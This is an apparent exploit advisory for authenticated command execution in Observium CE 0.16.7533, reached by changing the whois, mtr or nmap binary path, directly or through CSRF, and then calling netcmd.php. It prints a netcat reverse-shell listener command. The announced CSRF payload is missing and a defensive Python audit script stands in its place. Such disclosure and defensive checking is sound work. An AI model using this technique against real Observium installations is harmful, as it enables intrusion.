39745_Observium 0.16.7533 - (Authenticated) Arbitrary Command Execution - PHP WebApps exploit.txt

Details

# Exploit title: Observium Commercial - Authenticated RCE
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533

Authenticated remote code execution

Using either CSRF or by editing the whois binary field in the Observium web UI under Settings -> System Path, an attacker may change the path of any of [whois, mtr, nmap] to an arbitrary bash command, and then, by hitting the URL http:///netcmd.php?cmd=whois&query=8.8.8.8 as any Observium user (even a low-privileged one), trigger code execution. For example, set up a listener:

    root@pt:~# nc -lvp 4444
    listening on [any] 4444 ...

and a CSRF which looks like this:
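As an added defender-side check (not Observium's code and not part of this advisory), the following audits the Settings -> System Path values for whois, mtr and nmap against allow-listed absolute binaries and validates the netcmd.php query argument as an IP address or hostname; the allowed paths, function names and sample settings are assumptions.

```python
import ipaddress
import re
from pathlib import PurePosixPath

# Binaries netcmd.php may run, keyed by the "cmd" value. The absolute paths are
# assumed typical Linux locations, not Observium's own defaults.
ALLOWED_BINARIES = {
    "whois": {"/usr/bin/whois"},
    "mtr": {"/usr/bin/mtr", "/usr/sbin/mtr"},
    "nmap": {"/usr/bin/nmap"},
}
# Characters that let a configured "path" turn into a shell command line.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\\'\"]")
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$", re.I)


def check_binary_setting(cmd, configured):
    """Return None if the configured path is acceptable, else a reason string.
    Rejects a trailing command, metacharacters, whitespace, relative paths and
    any binary that is not on the allow list for this cmd."""
    if cmd not in ALLOWED_BINARIES:
        return f"unknown cmd {cmd!r}"
    if SHELL_META.search(configured) or any(c.isspace() for c in configured):
        return "shell metacharacters or whitespace in path"
    if not PurePosixPath(configured).is_absolute():
        return "path is not absolute"
    if configured not in ALLOWED_BINARIES[cmd]:
        return f"{configured!r} is not an allow-listed {cmd} binary"
    return None


def check_query(query):
    """The query argument must be an IP address or a hostname, nothing else."""
    try:
        ipaddress.ip_address(query)
        return None
    except ValueError:
        pass
    if HOSTNAME.match(query):
        return None
    return "query is neither an IP address nor a hostname"


def audit_settings(settings):
    """Audit {cmd: configured_path} as exported from the web UI (constructed
    input) and return (cmd, reason) findings; an empty list means untampered."""
    return [(cmd, r) for cmd, path in settings.items()
            if (r := check_binary_setting(cmd, path))]
```

Run `audit_settings` against a periodic export of the System Path settings to detect the tampering this advisory describes before netcmd.php is hit.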